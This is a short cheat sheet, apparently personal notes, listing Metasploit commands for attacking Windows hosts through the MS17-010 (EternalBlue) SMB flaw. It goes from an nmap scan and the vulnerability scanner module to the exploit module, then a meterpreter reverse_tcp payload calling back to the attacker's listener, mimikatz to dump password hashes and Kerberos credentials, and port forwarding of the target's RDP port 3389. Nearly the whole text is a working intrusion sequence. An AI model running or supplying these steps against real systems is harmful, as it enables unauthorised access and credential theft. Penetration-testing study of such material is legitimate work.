nmap -sV -Pn xxxxx (scan ports and system information)
use auxiliary/scanner/smb/smb_ms17_010 (scanner module)
set Rhosts (the scan target)
use exploit/windows/smb/ms17_010_eternalblue (attack module)
The target IP needs to be set
Listener
LHost: the local machine's IP
Attack payload
set payload windows/x64/meterpreter/reverse_tcp
load mimikatz (load the mimikatz extension)
msv (export hashes)
kerberos (get account passwords)
Port forwarding
portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r xxxxx (xxxxx is the target IP)
Forwards the target's port 3389 to local port 3389